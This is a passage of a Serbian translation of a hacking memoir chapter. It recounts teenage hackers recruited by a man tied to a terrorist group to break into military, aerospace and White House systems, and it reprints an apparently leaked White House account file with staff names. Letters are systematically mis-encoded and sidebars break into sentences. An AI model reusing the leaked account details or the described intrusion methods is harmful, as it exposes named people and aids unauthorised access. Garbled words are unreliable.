Nastavio sam jer sam tvrdoglav. Uzbuœivala me je pomisao da ñu biti plañen za to ãto radim. I mislio sam: “Moæda se novac stvarno usput zaturio, moæda ñe mi ovaj put platiti.” Ne znam zaãto sam nastavio s tim. Zbog opsesivne prirode? Æeœi za novcem? Æudçe za moñi? Mogao bih nabrojati mnogo razloga. U isto vreme dok je dodeàivao zadatke da ih ne0h reãava, Kalid je krstario IRC prezentacijama traæeñi druge zainteresovane igraåe. Comrade je bio zainteresovan, mada je bio oprezan kada je trebalo prihvatiti novac.

Koliko sam shvatio, on je plañao àudima, ali ja nikada nisam hteo da mu dam svoje podatke kako bih primio novac. Pomislio sam – to ãto ja radim samo je razgledaçe, ali ako poånem da primam pare, postañu pravi kriminalac. S çim sam uglavnom razgovarao preko IRC-a i s vremena na vreme mu dobacivao poneku datoteku sa IP adresama sistema. Novinar Nil Makaj razgovarao je s joã jednom ribom koju je Kalid upecao u svoju mreæu – tinejdæerom iz Kalifornije åija je identifikacija bila Kameleon (Chameleon), i koji je danas suosnivaå uspeãne kompanije za bezbednost. Priåa koju je Makaj objavio na prezentaciji wired.com1, poklapala se sa detaàima koje su ispriåali ne0h i Comrade. “Jedne noñi sam bio na IRC-u kada je taj tip rekao da mu treba DEM softver. Ja ga


Rekavãi da ñe mu ugovorenih hiàadu dolara poslati poãtom, Kalid je poåeo da zivka mobilnim otprilike jednom nedeàno, kako kaæe ne0h, “obiåno dok je vozio”. Sledeñi zadatak bio je upad u raåunarski sistem indijskog Centra za istraæivaçe atomske energije (Bhabha Atomic Research Center). Centar je koristio radnu stanicu Sun koja je poznata svim hakerima. ne0h je lako uãao u çu, ali je otkrio da maãina ne sadræi nikakve zanimàive informacije i da je samostalna – nije povezana ni sa jednom mreæom. Kalid nije delovao zabrinuto zbog neuspeha. U meœuvremenu, novac za upad u kineski univerzitet nije stigao. Kada je ne0h pitao za çega, Kalid se iznervirao. “Nisi ga dobio? Poslao sam ti keã u roœendanskoj åestitki!”, tvrdio je. Bila je to otrcana fraza: “Poslali smo åek poãtom”, ali je ne0h ipak rado nastavio da prihvata zadatke. Zaãto? Danas odgovor na to traæi introspekcijom.

Umeñe provale

30

nisam imao i samo sam se izmotavao s çim”, tvrdio je haker. Kalid se u to vreme veñ uozbiàio: “DEM” je skrañenica za Defense Information Systems Network Equipment Manager – softver za mreæe koji je koristila vojska. Program je skinula grupa hakera Masters of Downloading, i kruæile su glasine da do çega moæete doñi ako ga zatraæite od prave osobe. Niko ne zna da li se Kalid ikada doåepao tog programa – ili bar niko neñe da prizna. Zapravo, nije potpuno sigurno ni da bi mu taj softver iãta vredeo – ali on je oåigledno mislio da bi. Kalid je zavrãio svoje igre s kineskim univerzitetima i sliånim sitnim poslovima. “Pokuãao je da se ukàuåi u ono ãto su momci u grupi radili”, priåao nam je ne0h. Kalid se javàao hakerima tokom godinu i po dana: “Nije bio neko ko bi se sporadiåno pojavàivao, javàao se redovno. Bio je tu i svi su znali da je to çegova stvar”. Kada kaæe “çegova stvar”, ne0h misli na upadaçe u vojne prezentacije ili raåunarske sisteme komercijalnih kompanija koje rade na vojnim projektima. Kalid je traæio da ne0h upadne u Lockheed Martin i nabavi ãeme odreœenih avionskih sistema koji su se u toj kompaniji pravili za Boing. ne0h je uspeo da delimiåno prodre u Lockheed, “oko tri koraka u unutraãçu mreæu”, ali nije uspeo da ode dubàe od dva servera (doãao je do nivoa koji àudi iz bezbednosti nazivaju “demilitarizovana zona” ili “DMZ” – niåija zemàa). To nije bilo dovoàno da proœe barijere koje su ãtitile najosetàivije korporacijske podatke, i nije mogao da pronaœe zahtevane informacije.

[Kalid] se razdraæio. Otprilike je rekao: “Viãe ne radiã za mene. Ne moæeã niãta da obaviã”. Ali onda me je optuæio da sam zadræao informacije za sebe. Potom je rekao: “Zaboravi Lockheed Martin. Idi direktno na Boing.” ne0h je otkrio da Boing “nije toliko obezbeœen, ako se dovoàno potrudite”. On je upao iskoristivãi poznatu slabost Boingovog sistema – izloæenost Internetu. Poãto je instalirao “çuãkalo” (program za nadgledaçe protoka podataka, engl. sniffer), mogao je da osluãkuje sve pakete podataka koji su ulazili u raåunar i izlazili iz çega – program je radio kao prisluãni ureœaj za raåunare. Tako je doãao do lozinki i neãifrovanih e-poruka. Informacije koje je skrpio iz e-poruka otkrile su dovoàno podataka za ulazak u internu mreæu.

Pronaãao sam ãest ili sedam ãema za vrata i nos Boinga 747 – samo prolazeñi kroz tekstualne e-poruke. Ljudi su slali neãifrovane priloge uz poruke. Zar to nije sjajno?! (Tu se zasmejao.) Kalid je bio ushiñen. Rekao je da ñe mi dati 4.000 dolara. To se, naravno, nikada nije desilo.

Veåeraãça meta: SIPRNET Kalid se nije trudio da Comradeu daje probne zadatke. Od samog poåetka, priåa ovaj haker, Kalida “su zanimali samo vojska i SIPRNET”.

On uglavnom nije konkretno govorio ãta hoñe – hteo je pristup vladinim i vojnim prezentacijama. Osim kada je u pitaçu bio SIPRNET. Informacije sa SIPRNET-a je zaista æeleo. Nije ni åudo ãto je Kalid æudeo za tim podacima. Oni su verovatno bili çegov cià od samog poåetka. SIPRNET je deo mreæe odbrambenog informacionog sistema, DISN-a (engl. Defense Information System Network), koji prenosi poveràive poruke. Ãtaviãe, SIPRNET (skrañenica za Secret Internet Protocol Router Network) sada je sræ komandovaça i kontrole u vojsci SAD. ne0h je veñ odbio Kalidovu ponudu da prodre u SIPRNET:

Ponudio je 2.000 dolara. Odbio sam ga. Da sam uãao u SIPRNET, federalci bi mi zaåas doãli na vrata. 2.000 dolara nije vredno rupe u glavi. Kada je Kalid razgovarao s Comradeom o tom zadatku, cena je skoåila. “Mislim da je rekao da ñe platiti deset hiàada dolara za pristup”,


Zapravo, 4.000 dolara bi bilo previãe za te informacije. Sudeñi po bivãem direktoru bezbednosti Boinga, Donu Belingu, ovaj upad se moæda zaista desio kao ãto je opisano. Meœutim, on bi bio åisto gubàeçe vremena: kada nov tip aviona uœe u eksploataciju, sve putniåke agencije dobijaju kompletne skupove ãema. U tom trenutku, te informacije se viãe ne smatraju osetàivim. Moæe ih dobiti svako ko poæeli. “Nedavno sam na lokaciji eBay video i CD sa ãemama za 747”, rekao je Don. Naravno, Kalid to verovatno nije znao. Proãlo je dve godine dok nacija nije otkrila da su neki teroristi imali jake razloge da æele ãeme glavnih putniåkih aviona koje koriste ameriåke avionske kompanije.

priseña se Comrade. To je bila dobra pogodba àudima koji se nisu snebivali da prihvate projekte. Ipak, on tvrdi da ga je u iskuãeçe bacio izazov, a ne novac.

Umeñe provale

32

U stvari, SIPRNET-u sam se dosta primakao. Uãao sam u jedan raåunarski sistem u DISA (Defense Information Security Agency).Taj raåunar je bio izuzetno dobar. Mislim da je imao åetiri procesora, oko 2.000 àudi je imalo pristup, Unixova datoteka sa IP adresama imala je oko 5.000 razliåitih servera, a polovina je koristila privilegovane naloge. Morao si da budeã za tim raåunarom da bi mu pristupio – nisi to mogao da uradiã spoàa. Kako god da je to zakàuåio, Comrade je ispravno slutio da je nabasao na neãto bitno. Glavne misije DISA ukàuåuju zdruæenu komandu i kontrolu, i raåunarsku podrãku jedinicama u borbi – mudro preklapaçe sa funkcijama SIPRNET-a. Meœutim, çegovi napori su saseåeni.

Bilo je simpatiåno imati sve te pristupe, ali nisam imao dovoàno vremena da se time poigram i uradim neãto. Ukebali su me tri ili åetiri dana kasnije.

Vreme za zabrinutost Na Boæiñ 1999, ne0h i Comrade su doæiveli ãok. Let IC-814 Indian Airlinesa, na pravcu Katmandu – Nju Delhi, sa 178 putnika i 11 ålanova posade, otet je u toku leta. Reporteri su javili da su otimaåi bili pakistanski teroristi povezani s Talibanima. Teroristi kao ãto je Kalid? Pod komandom otmiåara, Airbus A300 nastavio je cik-cak putaçom do Sredçeg Istoka i nazad, nakratko sletevãi u Indiji, Pakistanu i Ujediçenim Arapskim Emiratima, gde je izbaåeno telo zaklanog putnika. Bio je to mlad åovek koji se sa tek venåanom suprugom vrañao kuñi s medenog meseca. On je na smrt izboden jer je odbio da stavi povez na oåi. Avion je konaåno sleteo u Kandahar u Avganistanu – ãto je dodatno ukazivalo na vezu s Talibanima. Preostali putnici i posada zadræani su u avionu tokom osam dana ispuçenih terorom, i na kraju su puãteni u zamenu za oslobaœaçe tri uhapãena militanta. Jedan od osloboœenih zatvorenika, Ãeik Umer, kasnije je pomogao u finansiraçu Mohameda Ate, voœe napada na Svetski trgovinski centar 11. septembra.

Nakon otmice, ne0h je saznao od Kalida da je çegova grupa odgovorna i da je i on sâm uåestvovao u otmici.

Na smrt sam se uplaãio. On je bio loã. Oseñao sam da moram da saåuvam æivu glavu.

Comrade je uhapãen Situacija je postala gusta, a uskoro ñe se i pogorãati. Nekoliko dana poãto je Comrade uspeo da prodre u sistem povezan sa SIPRNET-om, çegovog oca je na putu do posla zaustavila policija. Rekli su mu: “Hoñemo da razgovaramo s tvojim sinom”, i pokazali mu nalog za pretres. Comrade se priseña:

Bilo je tu àudi iz NASA, Ministarstva odbrane, FBI-ja. Sve u svemu, bilo je oko deset ili dvanaest agenata, i nekoliko policajaca. Petàao sam po nekim Nasinim sanduåiñima, postavio sam “çuãkalo” na ns3.gtra.mil da bih pokupio lozinke. Ali, tako sam pokupio i e-poruke. Rekli su mi da sam zbog toga optuæen za nelegalno prisluãkivaçe. A za Nasine raåunare dobio sam krãeçe zaãtiñenih prava. I druge stvari. Samo dan ranije, prijateà mi je rekao: “Åoveåe, uskoro ñe nas uhvatiti”. Odlepio je. Pomislio sam: “U pravu je”. Zato sam obrisao svoj disk.


Ali çegovu zabrinutost ublaæavala je deåaåka pohlepa. “I daàe sam se nadao da ñe mi isplatiti moj novac”, dodao je ne0h. Veza sa otmicom dolila je uàe na vatru koju je Kalid ranije zapalio. U jednom trenutku, oåigledno iznerviran neuspeãnim pokuãajima tinejdæera da mu pribave informacije koje je traæio, Kalid je pokuãao s taktikom visokog pritiska. Novinar Nil Makaj, u ranije navedenoj priåi za wired.com, napisao je da je video staru poruku na IRC-u koju je Kalid poslao ovim mladiñima i u kojoj je pretio da ñe ih ubiti ako ga prijave Federalnom istraænom birou. Makaj je napisao da je video i sledeñu poruku od Pakistanca: “Hoñu da znam: da li je [iko] priåao federalcima o meni?” A na drugom mestu: “Reci im [ako to urade] da su mrtvi. Nahuãkañu snajperiste na çih.”2

Meœutim, Comrade nije bio temeàan pri åiãñeçu. “Zaboravio sam stare diskove koji su mi stajali na stolu.”

Ispitivali su me. Priznao sam. Rekao sam: “Æao mi je. Evo ãta sam uradio, evo kako ñete popraviti, viãe to neñu raditi.” A oni su rekli, kao: “U redu, neñemo te tretirati kao kriminalca. Nemoj to viãe da radiã. Ako to ponovo uradiã, ne ginu ti lisice.” Spakovali su moje raåunare, periferne ureœaje i rezervne diskove, i otiãli.

Umeñe provale

34

Kasnije su pokuãali da nateraju Comradea da im kaæe lozinku za svoje ãifrovane diskove. Kada je odbio, rekli su da znaju kako da ih provale. Comrade je mislio da ne mogu: koristio je PGP ãifrovaçe i lozinka mu je bila “duga oko sto znakova”. Ipak, on tvrdi da nije bila teãka za pamñeçe – bila su to çegova tri omiàena citata spojena u niz. Oko ãest meseci nije imao kontakta s policijom. A onda je jednog dana åuo da ñe vlada podneti tuæbu. Do trenutka kada je dospeo na sud, bio je optuæen za, kako je tuæilac tvrdio, tronedeàno iskàuåivaçe Nasinih raåunara i presretaçe hiàada poruka unutar Ministarstva odbrane. (Kao ãto i sâm vrlo dobro znam, “ãteta” koju tuæioci navode i stvarna ãteta ponekad su veoma razliåite. Comrade je iz Nasinog centra Marshall Space Flight u Alabami preuzeo softver koji se koristi za kontrolisaçe temperature i vlaænosti u meœunarodnoj svemirskoj stanici. Vlada je tvrdila da je zbog toga morala da na tri nedeàe iskàuåi odreœene raåunarske sisteme. Napad na Ministarstvo odbrane pruæio je realistiåniji razlog za brigu: Comrade je provalio u raåunarski sistem Odbrambene agencije za ublaæavaçe pretçi (engl. Defense Threat Reduction Agency) i instalirao “zadça vrata” koja su mu omoguñila pristup u bilo koje vreme.) Vlada je oåigledno ovaj sluåaj smatrala bitnim za upozoravaçe ostalih hakera tinejdæera. U medijima je suœeçu posveñena velika paæça i Comrade je proglaãen najmlaœom osobom koja je ikada osuœena za hakerisaçe kao federalni zloåin. Glavni tuæilac Dæenet Rino je åak dala izjavu u kojoj kaæe: “Ovaj sluåaj, u kom ñe prvi put maloletni haker sluæiti zatvorsku kaznu, pokazuje da ozbiàno shvatamo raåunarske upade i da sa svojim partnerima iz kriminalistiåke sluæbe radimo na agresivnoj borbi protiv ovih pojava”.

Ispitivaçe Kalida Da li je Kalid bio militant kao ãto je tvrdio, ili samo prevarant koji je manipulisao tinejdæerima? Ili je to moæda bila operacija Federalnog istraænog biroa kojom su isprobavali koliko daleko su mladi hakeri voàni da idu? Pre ili kasnije, svaki haker koji je imao posla s Kalidom posumçao je da on nije zaista bio militantni aktivista. Åini se da ih je pomisao da su informacije davali stranom agentu muåila maçe od moguñnosti da ih je taj tip samo navukao. Comrade kaæe da se “najviãe pitao ãta je [Kalid] bio. Nisam znao da li je federalac ili je bio ono ãto je tvrdio. Na osnovu


Sudija je Comradea osudio na ãest meseci zatvora i ãest meseci uslovne kazne, s poåetkom nakon zavrãetka polugodiãta. Comradeova majka je tada joã bila æiva. Angaæovala je novog advokata, napisala mnogo pisama, sudiji je prikazala “potpuno nov sluåaj” i, za divno åudo, uspela da smaçi kaznu na kuñni pritvor i potom åetiri godine uslovne kazne. Ponekad u æivotu ne koristimo ãanse koje nam se pruæaju. “Odsluæio sam kuñni pritvor i u toku je bila uslovna kazna. Razne stvari su se desile, poåeo sam previãe da se zabavàam, pa su me poslali na rehabilitaciju.” Kada je rehabilitacija proãla, Comrade se zaposlio u Internet kompaniji i zapoåeo sopstveni posao sa Internetom. Meœutim, on i sluæbenik za uslovnu kaznu nisu su previãe viœali, pa je Comrade na kraju ipak otiãao u zatvor. Imao je samo ãesnaest godina, a zatvoren je za dela koja je poåinio kada je imao petnaest. U federalnom kaznenom sistemu nema tako mnogo maloletnika. Ispostavilo se da su ga poslali u “kamp” (prava reå za to mesto) u Alabami, u kom je bilo samo deset zatvorenika. Comrade za kamp kaæe da je “viãe nalik ãkoli – zakàuåana vrata i ograda od bodàikave æice, ali inaåe nije imalo mnogo veze sa zatvorom”. Åak nije morao da ide na åasove jer je veñ zavrãio sredçu ãkolu. Kada se vratio u Majami i na sluæeçe uslovne kazne, Comrade je dobio spisak hakera s kojima ne sme da razgovara. “Na listi je pisalo, ovaj tip, onaj tip i – ne0h.” Samo “ne0h” – federalna vlada ga je znala samo po identifikaciji. “Nisu imali pojma ko je on. Ako sam ja imao pristup do dve stotine stvari, on je imao pristup do hiàadu”, kaæe Comrade. “ne0h je bio priliåno veãt.” Koliko oni znaju, kriviåni organi joã uvek nisu uspeli da otkriju çegovo ime ili lokaciju.

Umeñe provale

36

razgovora koji su vodili ne0h i Kalid, zakàuåio sam da ne laæe. Ali nikada od çega nisam uzeo novac – to je bila granica koju nisam hteo da preœem.” (Ranije u razgovoru, kada je prvi put pomenuo deset hiàada dolara koje je Kalid ponudio, Comrade je zvuåao impresioniran sumom. Da li bi odbio novac ukoliko bi çegovi pokuãaji bili uspeãni, a Kalid mu zaista platio? Moæda ni sam Comrade ne zna da odgovori na to pitaçe.) ne0h kaæe da je Kalid “zvuåao potpuno profesionalno” ali priznaje da se povremeno pitao je li ovaj zaista militantni aktivista. “Sve vreme dok sam razgovarao s çim, mislio sam da previãe baàezga. Ali nakon istraæivaça s prijateàima koji su s çim razgovarali i kojima je davao druge informacije, zakàuåili smo da je zaista bio ono ãto je tvrdio.” Haker Savec0re je na IRC-u sreo nekoga ko je rekao da u FBI ima strica koji bi mogao da sredi imunitet za celu hakersku grupu Milw0rm. “Mislim da bismo time poslali poruku FBI-ju da nismo neprijateàski nastrojeni”, Savec0re je rekao Makaju u intervjuu putem e-poãte. “Dao sam mu moj broj telefona. Sledeñeg dana me je pozvao navodni FBI agent sa zaåuœujuñe jakim pakistanskim akcentom.” “Rekao je da se zove Majkl Gordon i da je radio za FBI u Vaãingtonu”, Savec0re je ispriåao novinaru. “Shvatio sam da je to sve vreme bio Ibrahim.” Mada su se neki àudi pitali da li je navodni terorista bio tajni agent Federalnog istraænog biroa, Savec0re je doãao do suprotnog zakàuåka: da je tip koji je tvrdio da je FBI agent u stvari isti terorista koji je pokuãavao da vidi jesu li su momci spremni da propevaju o çemu. Ideja da je to moæda bila operacija FBI-ja nema åvrste osnove. Ukoliko je federalna vlada htela da otkrije za ãta su ovi klinci sposobni i koliko daleko su spremni da idu, obeñani novac bi stigao. Kada FBI pomisli da je situacija dovoàno ozbiàna da zahteva angaæovaçe tajnog agenta, oni u taj trud ulaæu novac. Neverovatno bi bilo da su obeñali 1000 dolara, a da to nisu platili. Izgleda da je samo jedan haker zaista dobio novac od Kalida – Kameleon. “Jedno jutro sam otiãao do sanduåeta i u çemu je bio åek na hiàadu dolara s brojem koji treba da pozovem u Bostonu”, ispriåao je Kameleon u priåi za Wired News (4. novembra 1998). Kalid je saznao da on ima mape vladine raåunarske mreæe – åek je bio uplata za te mape. Kameleon je unovåio åek. Dve nedeàe kasnije FBI mu je upao u kuñu i ispitivao ga o isplati, ãto pokreñe zanimàivo pitaçe o tome kako je vlada saznala za tih hiàadu dolara. To se desilo pre 11. septembra,

Organizacija Harkat ul-Mudæahedin Dok je pretraæivao dnevnike interaktivnih razgovora na Internetu, novinar Makaj je otkrio da se Kalid jednom prilikom predstavio mladim hakerima kao ålan organizacije Harkat-ul-Ansar3. Sudeñi po Pregledu obaveãtajne sluæbe Juæne Azije (South Asia Intelligence Review), “SAD su proglasile Harkat-ul-Ansar teroristiåkom organizacijom zbog çihove veze s proteranim saudijskim teroristom Osamom Bin Ladenom 1997. Da bi se izbegle posledice ameriåke zabrane, grupa je 1998. promenila ime u Harkat ul-Mudæahedin.”4 Ministarstvo inostranih poslova SAD iznova je upozoravalo na tu grupu. Jedna çihova objava kaæe: “Pakistanski zvaniånici su izjavili da su u ameriåkim vazduãnim napadima 23. oktobra [2001] ubijena 22 pakistanska gerilca koji su se borili uz Talibane u blizini Kabula. Poginuli su bili ålanovi organizacije Harkat ul-Mudæahedin... [koju] je Ministarstvo inostranih poslova postavilo na zvaniånu listu teroristiåkih organizacija 1995.”5 Zapravo, Harkat je danas jedna od trideset ãest grupa koje su u SAD oznaåene kao strane teroristiåke organizacije. Ameriåka vlada ih, drugim reåima, smatra najgorim àudima na kugli zemaàskoj. Naravno, mladi hakeri to nisu znali. Za çih je sve bila samo igra. Govoreñi u aprilu 2002. o bezbednosti informacija, general-major indijskih vojnih snaga, potvrdio je da je Kalid terorista, ispriåavãi o


dok se FBI fokusirao na domañi kriminal i slabo pratio teroristiåke pretçe. Kameleon je priznao da je uzeo novac, ali je novinaru Wired Newsa tvrdio da nije dao nikakve mape vladine mreæe. Mada je Kameleon priznao da je uzeo novac od stranog teroriste, za ãta bi mogao biti optuæen za ãpijunaæu i dobiti veoma dugu zatvorsku kaznu, nikakva optuænica nije bila podignuta – ãto daàe produbàuje misteriju. Moæda je vlada samo htela da se po hakerskoj zajednici proåuje da saraœivaçe sa stranim agentima moæe biti riziåno. Moæda åek i nije bio od Kalida, veñ od FBI-ja. Samo nekoliko àudi zna Kameleonov pravi identitet, i on bi voleo da tako i ostane. Hteli smo da åujemo çegovu verziju priåe. Odbio je da govori o tome (samo pomenuviãi kako je mislio da je Kalid u stvari federalac koji se predstavàa kao terorista). Da sam na çegovom mestu, ni ja ne bih hteo da me intervjuiãu na tu temu.

hakerskim vezama sa “Kalidom Ibrahimom iz organizacije Harkat-ulAnsar smeãtene u Pakistanu”.6 General se, meœutim, pribojavao da Kalid nije u Pakistanu veñ u Delhiju, u Indiji.

Posledice 11. septembra

Umeñe provale

38

Neki hakeri manipuliãu i obmaçuju. Oni varaju raåunarske sisteme navodeñi ih da pomisle kako imaju ovlaãñeça koja su zapravo ukrali. Oni veæbaju laæno predstavàaçe da bi manipulisali àudima i postigli svoje ciàeve. Sve to znaåi da, kada govorite s hakerom, morate sluãati paæàivo i utvrditi da li ono ãto vam govori, i naåin na koji to govori, zvuåi uveràivo. Ponekad prosto neñete biti sigurni. Koautor ove kçige i ja nismo bili sigurni u ono ãto nam je ne0h rekao o svojoj reakciji na 11. septembar. Poverovali smo mu toliko da vam prenesemo çegovu izjavu.

Znate li koliko sam plakao tog dana? Bio sam siguran da je gotovo s mojim æivotom. Te reåi je propratio åudnim, nervoznim smehom – s kojim znaåeçem? Nismo mogli da odredimo.

Pomisao da sam imao veze s tim. Da sam uãao u Lockheed Martin ili Boing i doãao do joã informacija, mogli su da ih iskoriste. Bilo je to loãe vreme za mene i za Ameriku. Plakao sam jer nikada nisam pomislio na to da ga prijavim. Nisam dobro rasuœivao. To je bio razlog zbog kog me je angaæovao da uradim sve te stvari... [Pomisao] da sam i malim prstom uåestvovao u onom ãto se desilo s Trgovinskim centrom... u potpunosti me je skrhala. U Svetskom trgovinskom centru stradala su tri moja druga. Nikada se nisam oseñao tako loãe. Mnogi hakeri su tinejdæeri, pa åak i mlaœi. Da li je to prerano da bi se prepoznala potencijalna opasnost ili reagovalo na zahteve nekoga ko bi mogao predstavàati pretçu zemài? Mislim da su nakon 11. septembra ameriåki hakeri – åak i oni veoma mladi – postali sumçiåavi i da je malo verovatno da ñe ih teroristi prevariti. Nadam se da sam u pravu.

Upad u Belu kuñu

Mislim da su u Beloj kuñi reinstalirali operativni sistem. Sve su vratili na podrazumevane vrednosti. I u tom periodu, u trajaçu od deset, petnaest minuta, Zyklon i MostFearD uspeli su da uœu, doœu do skrivene datoteke lozinki, provale je, uœu, i promene Web prezentaciju. Bio sam tamo dok su to radili. Trebalo je samo da budu na pravom mestu u pravo vreme. Desilo se sluåajno – bila je åista sreña da su se zadesili na vezi baã kada je neko radio na prezentaciji.


Istorija raåunarske bezbednosti u neku ruku ima sliånosti s davnom istorijom kriptografije. Vekovima su àudi smiãàali ãifre koje su oznaåavali kao “nemoguñe za otkrivaçe”. Åak i danas, u eri raåunara koji mogu brzo ãifrovati poruku pomoñu kàuåa za jednokratnu upotrebu, ili kàuåa koji sadræi stotine znakova, veñina kodova i daàe se moæe deãifrovati. (Ameriåka organizacija za ãifrovaçe i deãifrovaçe, Agencija za nacionalnu bezbednost – engl. National Security Agency, razmeñe se brojem najveñih, najbræih i najmoñnijih raåunara na svetu.) Bezbednost raåunara je kao stalna igra maåke i miãa u kojoj su struåçaci za bezbednost na jednoj strani, a upadaåi na drugoj. Operativni sistem Windows sadræi desetine miliona redova koda. Sasvim je jasno da svaki ogroman softver mora da sadræi slabosti koje ñe posveñeni hakeri pre ili kasnije otkriti. U meœuvremenu, radnici u kompanijama, åinovnici, ponekad i profesionalci u oblasti bezbednosti, instalirañe nov raåunar ili program i zaboraviti da promene podrazumevanu ãifru, ili se neñe potruditi da smisle ãifru koja je bar donekle sigurna – ostavàajuñi ureœaj u raçivom staçu. Ako åitate vesti o hakerskim napadima i upadima, znate da su vojne i vladine prezentacije, åak i Web prezentacija Bele kuñe, veñ ugroæene. Ponekad neprestano. Upad na prezentaciju i meçaçe Web strane je jedno – to je uglavnom trivijalna, ili bar dosadna stvar. I pored toga, mnogi àudi se oslaçaju na samo jednu lozinku koju koriste svuda. Ukoliko provaàivaçe u Web prezentaciju vodi do hvataça lozinki, napadaå moæe dospeti u situaciju da ima pristup ostalim sistemima u mreæi i moæe da napravi mnogo veñu ãtetu. ne0h kaæe da su 1999. godine on i joã dva ålana hakerske grupe gLobaLheLL uradili upravo to, na jednom od najosetàivijih mesta u SAD-u – u Beloj kuñi.

O tome smo priåali u priåaonici grupe gLobaLheLL. Probudio me poziv oko 3 ujutro kojim su me obavestili ãta se deãava. Rekao sam: “Baàezgaã. Dokaæi.” Skoåio sam za raåunar. I stvarno, uradili su to. MostFearD i Zyklon obavili su najveñi deo posla. Dali su mi skrivenu datoteku da je provalim ãto bræe mogu. Doãao sam do jedne [lozinke] – bila je to obiåna reå iz reånika. I to je bilo to.

Umeñe provale

40

ne0h nam je dao deo koda za koji kaæe da je datoteka lozinke koju su ostali nabavili i preneli mu. U çoj je naizgled nabrojano nekoliko ovlaãñenih korisnika, ålanova osobàa Bele kuñe7: root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:6001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh orion:x:1002:10:Christopher Adams:/usr/users/orion:/usr/ace/sdshell webadm:x:1130:101:Web Administrator:/usr/users/webadm:/bin/sh cadams:x:1003:10:Christopher Adams:/usr/users/cadams:/usr/ace/sdshell bartho_m:x:1004:101:Mark Bartholomew:/usr/users/bartho_m:/usr/ace/sdshell monty:x:1139:101:Monty Haymes:/usr/users/monty:/bin/sh debra:x:1148:101:Debra Reid:/usr/users/debra:/bin/sh connie:x:1149:101:Connie Colabatistto:/usr/users/connie:/bin/sh bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh

Ovo je vrsta Unixove ili Linuxove datoteke lozinki, kakva se koristi za skladiãteçe ãifrovanih lozinki u posebnoj, zaãtiñenoj datoteci. Svaki red navodi ime jedne osobe koja ima nalog na sistemu. Unos “sdshell” u

Slika 2-1: Strana kojom je zameçena Web prezentacija Bele kuñe, maj 1999.

Koliko se ne0h seña, momci odgovorni za ovaj upad na prezentaciju Bele kuñe nisu bili naroåito ushiñeni ãto su uspeli da upadnu na jednu


nekim redovima nagoveãtava da ti korisnici, zbog dodatne sigurnosti, imaju mali elektronski ureœaj nazvan “RSA SecureID”. On prikazuje ãestocifreni broj koji se meça svakih ãezdeset sekundi. Da bi se prijavili, ti korisnici moraju da unesu ãestocifreni broj koji je u tom trenutku prikazan na çihovom ureœaju SecureID, i liåni identifikacioni broj, PIN (koji ponegde dodeàuje kompanija, a nekad ga bira sam korisnik). Web prezentaciji Bele kuñe promeçena je matiåna strana u isto vreme kada je na çu provaàeno, kao dokaz da su hakeri bili tu, objasnio je ne0h. Dao nam je i vezu do upotrebàene strane (slika 2-1).8 Pored simbola hakerske grupe gLobaLheLL, poruka sadræi i logotip Hong Kong Danger Duo. To je, kaæe ne0h, laæno ime koje je izmiãàeno kako bi se dodao joã jedan element za obmaçivaçe.

Umeñe provale

42

od otprilike deset najsigurnijih Web prezentacija u zemài. Bili su “priliåno zauzeti upadaçem svuda”, objasnio je ne0h, “da bi svetu dokazali da smo najboài”. Umesto opãteg virtuelnog tapãaça po ramenu, on kaæe da se atmosfera moæe boàe opisati kao: “Dobro obavàen posao, momci, najzad smo uspeli, ãta je sledeñe?” Ali nije im ostalo mnogo vremena za bilo kakve druge upade. Njihovi svetovi su se ubrzo sruãili, a taj deo priåe nas ponovo vraña na misterioznog Kalida. Zyklon, inaåe poznat kao Erik Barns, odavde preuzima priåu. Kaæe da nikada zaista nije bio ålan grupe gLobaLheLL, ali je visio po IRC prezentacijama s nekim çenim ålanovima. Kako on opisuje dogaœaje, upad u prezentaciju Bele kuñe postao je moguñ kada je otkrio da je ona mogla biti ugroæena koriãñeçem rupe u programu PHF za pristup telefonskom imeniku postavàenom na Web. To je bila najbitnija slabost ali, mada su u hakerskoj zajednici znali za çu, “nije je koristilo mnogo àudi”, kaæe Zyklon. Izvodeñi viãe koraka (detaàno su objaãçeni u odeàku Saæetak, kasnije u ovom poglavàu), mogao je da zauzme osnovni direktorijum lokacije whitehouse.gov i obezbedi pristup drugim sistemima na lokalnoj mreæi, ukàuåujuñi server za e-poãtu Bele kuñe. Zyklon je u tom trenutku mogao da presretne poruke izmeœu osobàa Bele kuñe i javnosti, mada te poruke, naravno, ne bi otkrile nikakve poveràive informacije. Meœutim, Zyklon je rekao da je mogao i da “doœe do kopije lozinke i skrivenih datoteka”. Vrãàali su po prezentaciji, gledali ãta mogu da pronaœu i åekali da àudi poånu da dolaze na posao. Dok je åekao, dobio je poruku od Kalida koji mu je rekao da piãe ålanak o nedavnim upadima i pitao Zyklona da li je nedavno imao akcije o kojima bi govorio. “I onda sam mu rekao da smo upravo upali na Web prezentaciju Bele kuñe”, ispriåao je Zyklon. Zyklon mi je rekao da je u roku od par sati çihov program za prañeçe protoka podataka primeñen – administrator sistema je pokuãavao da otkrije ãta se deãava i uœe u trag àudima koji su bili na prezentaciji. Puka sluåajnost? Ili je baã tad imao neki razlog da postane sumçiåav? Proãli su meseci pre nego ãto je Zyklon pronaãao odgovor. Ali tada, åim je prisluãkivaå otkriven, momci su se povukli s prezentacije i nadali se da su pretekli administratora.

